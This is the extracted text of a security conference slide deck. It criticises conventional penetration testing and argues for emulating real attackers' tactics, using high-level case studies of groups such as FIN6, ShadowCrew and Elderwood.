Julian Cohen | @HockeyInJune
• Product Security | Flatiron HealthPreviously• Application Security | Financial Services• Vulnerability Researcher | Defense Contracting• Penetration Tester | Boutique Consulting• Educator | Universities
Tonsillectomies in 1930
“It is a little difficult to believe that among the mass of tonsillectomies performed to-‐day all subjects for operation are selected with true discrimination, and one cannot avoid the conclusion that there is a
tendency for the operation to be performed as a routine prophylactic ritual for no particular reason and with no particular result.”
http://ije.oxfordjournals.org/content/37/1/9.full
Modern Security Medicine
Doctors were recommending the procedure andpatients were having the procedure,
regardless of its effectiveness
The expected results of the procedure didnot match with the actual results,
but no one noticed or changed anything
Penetration Testing Market Survey
• http://eprints.lancs.ac.uk/74275/1/Penetration_testing_online_2.pdf
http://eprints.lancs.ac.uk/74275/1/Penetration_testing_online_2.pdf
Penetration Testing Considered Harmful
• Haroon Meer, 2010, 44CON• Limited Scope• Bad Testers• Poor OPSEC
• The penetration testing industry a market for lemons
http://blog.thinkst.com/p/penetration-‐testing-‐considered-‐harmful.htmlhttp://www.econ.yale.edu/~dirkb/teach/pdf/akerlof/themarketforlemons.pdf
The Wrong Findings In The Right Places
Penetration testing avoids highly likely attacks becausethe vulnerabilities that our penetration testers discover are not
the vulnerabilities that real attackers discover
Attacker Fallacies
Resourced Attackers
Motivated Attackers
Intelligent Attackers
http://intelreport.mandiant.com/Mandiant_APT1_Report.pdfhttps://www2.fireeye.com/rs/fireye/images/rpt-‐apt28.pdf
http://blog.trailofbits.com/2013/05/20/writing-‐exploits-‐with-‐the-‐elderwood-‐kit-‐part-‐2/
Attacker Playbooks
All attackers are resource constrained —@dinodaizoviAll attackers have a boss and a budget — @philvenables
Resourced constrained attackers favor low-‐overhead attacks
Low-‐overhead requires good scalability
Attackers who have multiple targets care about repeatability and scalability
Attackers operate like efficient businesses• Experts at the top• Employees are cheap and complete simple tasks
• Employees who don't meet their goals are fired
• Inefficient organizations fail quickly
Penetration testers operate like hobbyists• All employees are experts• Employees are expensive• Employees who do not produce are hard to fire
• Organizations that do not produce do not fail
• Customers rarely care about output
Attackers
In defense, we often mistake attacker efficiency for inadequacy
Attackers focus on inexpensive, but effectivemethods
Defenders are not being effective against certain attackers because we don’t understand these methods in which they operate
Complexity of Solution
http://www.slideshare.net/scovetta/2011-‐11-‐07-‐cyber-‐colloquium-‐zatko
• If you don't like the game,hack the playbook…• Peiter “Mudge” Zatko, 2011• Everywhere
Attacker Cost Graph
https://www.trailofbits.com/resources/attacker_math_101_slides.pdf
• Attacker “Math” 101• Dino Dai Zovi, 2011• SOURCE Boston, SummerCon
Case Study: Syrian Electronic Army
• Similar to: Lizard Squad and Anonymous• Politically-‐motivated, low-‐resourced attackers• DNS hijacking by phishing DNS providers• Website defacing on shared hosting providers• DDoS attacks with custom software• Botnets created with opportunistic vulnerabilities• Little to no post-‐exploitation
http://news.harvard.edu/gazette/story/2013/08/hack-‐attacks-‐explained/http://www.infowar-‐monitor.net/2011/06/syrian-‐electronic-‐army-‐disruptive-‐attacks-‐and-‐hyped-‐targets/
Case Study: ShadowCrew
• Financially-‐motivated, low-‐resourced attackers• Credit card data theft via SQL injection• Typically targets one website at a time• Scaled poorly with publicly available tools like sqlmap and havij• Manual post-‐exploitation
http://www.wired.com/2010/03/tjx-‐sentencing/
Case Study: FIN6
• Financially-‐motivated, medium-‐resourced attackers• Initial compromise via stolen credentials and phishing• Network enumeration with publicly available tools• Automatic search for AD servers and SQL servers with public tools• Automatic collection and exfiltration of card information• Command and control via RDP over SSH tunnels• Uses known privilege escalation vulnerabilities on Windows• Post-‐exploitation via Metasploit and other publicly available tools
https://www2.fireeye.com/rs/848-‐DID-‐242/images/rpt-‐fin6.pdfhttps://attack.mitre.org/wiki/Group/G0037
Case Study: Elderwood
• Similar to: APT1• State-‐sponsored, well-‐resourced attackers• Mostly low reliability Internet Explorer bugs• ASLR/DEP bypasses with Microsoft Office/Java• Exploits delivered via phishing and watering holes• Post-‐exploitation via batch scripting and manual Windows commands
http://blog.trailofbits.com/2013/05/14/writing-‐exploits-‐with-‐the-‐elderwood-‐kit-‐part-‐1/http://intelreport.mandiant.com/Mandiant_APT1_Report.pdf
Lockheed Martin’s Intrusion Kill Chain
http://www.lockheedmartin.com/content/dam/lockheed/data/corporate/documents/LM-‐White-‐Paper-‐Intel-‐Driven-‐Defense.pdf
• Eric M. Hutchins, Michael J. Cloppert, Rohan M. Amin, Ph.D.• 6th International Conference Information Warfare and Security (ICIW 11)
Attacker Emulation
Identify Attackers
Profile Attackers
Obtain Key Tactics
Rebuild Playbook
Replay Playbook
Utilize Results
Threat “Intelligence”
Instead of ephemeral information like IP addresses, MD5 hashes, and other indicators of compromise, we should be collecting and sharing
indelible information on techniques and procedures
Free Business Ideas
• Intelligence on attacker tactics and procedures• Attack emulation service• Which attacker groups I am vulnerable to
Identify Attackers
Profile Attackers
Obtain Key Tactics
Rebuild Playbook
Replay Playbook
Utilize Results
Attacker Emulation Example: RSA
Identify Attackers:Economic EspionageStrategic Espionage
Profile Attackers:State-‐SponsoredWell-‐Resourced
Obtain Key Tactics:Phishing
Watering HoleClient-‐Side Exploitation
Rebuild Playbook:Public ReconnaissancePhishing Campaigns
Client-‐Side Exploitation
Replay Playbook:Launch Attack
Utilize Results:Exploit Mitigation
SandboxingExecution Tree Analysis
Attacker Emulation Example: Flatiron
Identify Attackers:Financial Data TheftEconomic Espionage
Profile Attackers:Financially-‐MotivatedMildly-‐Resourced
Obtain Key Tactics:Phishing and CEO SpamOpportunistic Infection
Rebuild Playbook:Phishing Campaigns
Cheap Infection Tactics
Replay Playbook:Launch Attack
Utilize Results:E-‐Mail ScanningRegular PatchingMalware Discovery
Thanks
• Nicholas Arvanitis• Justin Berman• Brandon Edwards• Nick Freeman• Andreas Lindh• Chris Sandulow• Phil Venables• Dino Dai Zovi